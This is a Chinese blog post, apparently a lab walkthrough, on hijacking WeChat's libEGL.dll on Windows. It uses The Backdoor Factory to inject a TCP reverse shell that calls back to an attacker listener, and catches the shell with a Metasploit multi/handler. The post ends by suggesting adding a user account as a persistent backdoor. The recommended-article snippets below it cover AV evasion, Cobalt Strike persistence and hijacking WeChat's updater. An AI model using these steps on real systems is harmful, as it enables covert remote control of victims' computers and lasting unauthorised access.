微信DLL劫持反弹shell

最新推荐文章于 2024-02-03 12:06:26 发布
最新推荐文章于 2024-02-03 12:06:26 发布
阅读量4.4k 收藏 3
点赞数 2
分类专栏: 实习期
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/102930381
版权

DLL劫持是什么?

DLL,动态链接库文件,又称“应用程序扩展”,在执行某一程序时,相应的DLL会被调用。如果在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Windows会尝试去按照顺序搜索这些特定目录时下查找这个DLL,只要黑客能够将恶意的DLL放在优先于正常DLL所在的目录,就能够欺骗系统优先加载恶意DLL,来实现"劫持"。

实验环境

攻击机——kali:劫持工具——BDF,https://github.com/cream492/the-backdoor-factory
切换目录,./install.sh运行安装 ,./backdoor.py -h 查看是否安装好

在这里插入图片描述

微信——win10:任务管理工具:查找微信调用的DLL文件(ProcessExplorer),https://en.softonic.com/download/process-explorer/windows/post-download

实验过程

打开Process Explorer,选择View——Lower Pane View——DLLs

在这里插入图片描述
在这里插入图片描述

复制libEGL.dll 到the-backdoor-factory下

./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 7777 -H 192.168.1.180
-f 表示被劫持的 DLL 文件,-s 表示 shell 的类型,-P 表示 DLL 要连接 远程主机的端口,-H 表示 DLL 连接的远程主机

在这里插入图片描述
在这里插入图片描述

可以看到,新生成的dll文件在backdoored下,将文件重新放到物理机的目录下

在这里插入图片描述

设置参数
use exploit/multi/handler
set payload windows//shell_reverse_tcp
set lhost 192.168.1.180
set lport 7777
run

在这里插入图片描述
在这里插入图片描述
成功获取shell,可以使用 net user 添加用户,留后门。

per_se_veran_ce
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【C#源代码】PC微信 DLL劫持C语言源代码创建器
04-02
DLL劫持技术,是一个被微软公司封印了的超强注入技术。如果DLL劫持设计不合理,被注入之后,程序在调用原被劫持DLL的时候,将出现问题。使用这个工具,可以帮你自动创建你要劫持DLL,并且在程序调用原系统DLL的时候,依然正常工作,毫无影响。
本地微信DLL劫持提权复现
weixin_46686336的博客
11-11 782
DLL劫持提权、Windows提权
微信小程序--页面劫持
wangzai888的博客
04-01 1万+
小程序的页面劫持是在网上偶尔知道的方法,感觉很流氓(但是我喜欢)。原理就是利用了对象的原型继承,在页面开始前做些自己需要的更改。 来看这个案例: 根据产品的要求,需要把小程序很多页面做成入口页,每个入口页都需要做授权验证操作。 (一开始我提出可以做出一个单独验证登录页面,所有分享页面都是这个页面,然后在根据传的参数分发到各个不同的页面,但是这个方案被否了,说是影响用户体验);那就只能在...
看我如何用微信上线CobaltStrike
weixin_35771144的博客
12-11 2549
前言   DLL劫持漏洞是老生常谈的一个漏洞,已经被前辈们各种奇技淫巧玩烂。但DLL劫持技术在后渗透和域渗透中的权限提升和权限维持都起到了至关重要的作用。本文简单剖析DLL劫持技术并通过实例应用来查看如何在渗透工作中利用此项技术。篇幅稍长,各位读者耐心观看,文中有不妥之处请各位加以斧正。 DLL劫持原理 什么是DLL?   DLL是动态链接库文件,在Windows系统中,应用程序并不是一...
白加黑免杀-利用微信&QQ上线CS,轻松过某绒、某卫士、Defender
最新发布
qq_62169455的博客
02-03 1987
通常在运行一个EXE文件的时候,会先加载支持该EXE文件运行的DLL(动态链接库)文件,那如果把其中一个DLL文件替换成恶意DLLDLL里面注入一个后门文件, 当被攻击者双击执行程序时,就会加载恶意DLL,进而触发后门文件,最终达到控制对方主机的目的。替换DLL操作,也就是我们所说的“DLL劫持”,而“白+黑”里面的“白”则指的是EXE文件(带有数字签名),“黑”则指替换的恶意DLL
分别用C++和C#进行dll进程注入(微信也能注入)
04-02
工程包括:被注入的目标程序(C++ WinForm),注入dll, 注入程序(C++ WinForm),注入程序(C# WinForm),通过C++和C# 都可将dll注入目标程序中,目标程序可修改为其它程序,如微信。 在目录中含有已编译好的程序和dll,...
python 调用微信截图DLL加代码
04-02
微信截图DLL微信客户端提供的一种功能,允许用户通过编程方式截取微信屏幕快照。 首先,我们需要理解DLL的工作原理。DLL文件是一种包含可执行代码和数据的文件,可供多个程序同时使用。在Python中,我们可以使用`...
使用微信PC端的截图dll库实现微信截图功能
10-19
主要为大家详细介绍了使用微信PC端的截图dll库实现微信截图功能,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
c++ 编译opencv微信二维码识别 dll
05-04
c++ 编译opencv微信二维码识别 dll。 需要先自行编译opencv https://blog.csdn.net/ZChen1996/article/details/115988507
Cobaltstrike系列教程(十三)控制持久化
J0o1ey Blog
01-19 5425
0x000-前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-右键菜单实现控制持久化 在windows中,拿到目标主机权限后,,维持权限是必不可少的工作。 目前常见的手法有: 1.注册表 2.启动项 3.计时任务 4.设置服务 5.shift后门 6.dll劫持(白加黑) 7.利用其他安装的软件 ...
DLL劫持示例程序:EXE+DLL
07-03
1. 这是本人编写的DLL劫持演示程序,整个解决方案中包含三个工程:EXE主调程序、DLL被调程序、DLL劫持程序。 2. 本解决方案是基于VS2005开发的。
返回劫持代码
11-01
这个代码在微信端推广运用广泛,主要是用在用户点击返回按键时候触发的命令,可跳转指定页面,也可以配合随机跳转使用!
劫持WeChatUpdate.exe作为后门
Sven的忘却日记
01-08 7316
发现微信pc端在启动的时候,会检查注册表中的NeedUpdateType >= 100 就会先启动微信安装目录下的wechatupdate.exe 可以利用这个思路写个劫持微信更新程序的后门,具体思路如下: 1.释放木马到微信安装目录,覆盖WeChatUpdate.exe 2.写注册表修改NeedUpdateType=100 3.被攻击者下次启动微信时,检测到NeedUpdateType=1...
cobaltstrike安装_Cobaltstrike系列教程(十三)控制持久化
weixin_39964833的博客
11-30 956
0x001-右键菜单实现控制持久化在windows中,拿到目标主机权限后,,维持权限是必不可少的工作。目前常见的手法有:1.注册表2.启动项3.计时任务4.设置服务5.shift后门6.dll劫持(白加黑)7.利用其他安装的软件在之前给出的插件中,已经包含了控制持久化的插件如图,里面包含了很多控制持久化的方法,可自动执行前几个Persist(※)貌似都是劫持关键程序的dll实现控制持久化...
dns劫持!导致微信jssdk上挂广告
热门推荐
bestcjt的博客
12-13 1万+
这几天在做一个微信的投票网页,用的是vue+quasar UI框架,结果这几天发现偶尔上网页后有广告,如下图红色方框 以为自己的虚拟主机被攻击,但反复检查了都感觉没啥问题,然后怀疑是不是quasar这个框架有问题,因为我第一次用这个UI框架,是外国的,看着很正规的,也是反复查了,也没发现什么问题,也不是一直会出现,偶尔才出现一次,我就一直刷新,我先是截了正常时的网络访问状况
explorer被微信企业版劫持一例
James的博客
01-24 350
最近做HTTP相关学习时,搭建了相关环境,并抓包观察报文。环境建立在IPv4环回地址上。抓包时发现,该地址上有大量非预期的TCP包,并且windows启动时就存在,无法消除。 通过netstat或资源监视器可以发现,这些TCP报文是explorer发起的,并绑定在环回IPv4和IPv6的端口50051到50053端口上。感觉是explorer是被劫持了。 网上搜索发现此现象和微信企业版有关,前不久曾经安装过微信企业版,并卸载了,看来是有残留。下载相关卸载工具并运行,会重置explorer,异常TCP包就消失
微信端视频播放防被浏览器劫持
milli236的博客
07-12 3688
微信浏览器的坑,包括移动的浏览器都有可能自动拦截。设置属性: <video id="mainvideo" src="static/video/Mate10.mp4" autoplay width="100%" x5-playsinline="" webkit-playsinline="" preload="auto"&a
老树开新花:DLL劫持漏洞新玩法
whl0071的专栏
09-29 618
本文原创作者:丝绸之路 DLL劫持漏洞已经是一个老生常谈,毫无新鲜感的话题了。DLL劫持技术也已经是黑客们杀人越货,打家劫舍必备的武器。那么,随着Win10的诞生,微软是否已经修复了此漏洞?同时在当前的安全环境下,DLL劫持漏洞是否又有新的利用方式和价值? 本文将对DLL劫持漏洞的原理,漏洞实现,漏洞挖掘,漏洞利用,漏洞防御等方面进行分析。 0x01 DLL劫持漏洞原理 在Windows系统中,为了节省内存和实现代码重用,微软在Windows操作系统中实现了一种共享函数库的方式。这就是DLL(D
DLL劫持案例——反弹shell
渗透测试
09-02 647
目标,对一个录屏软件进行dll劫持
微信小程序如何运行shell脚本
04-24
很抱歉,由于我是一个语言模型 AI,本身并没有实际的操作环境,因此我无法直接演示微信小程序如何运行 shell 脚本。但一般情况下,微信小程序是不能直接运行 shell 脚本的,因为微信小程序是运行在微信客户端内的,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值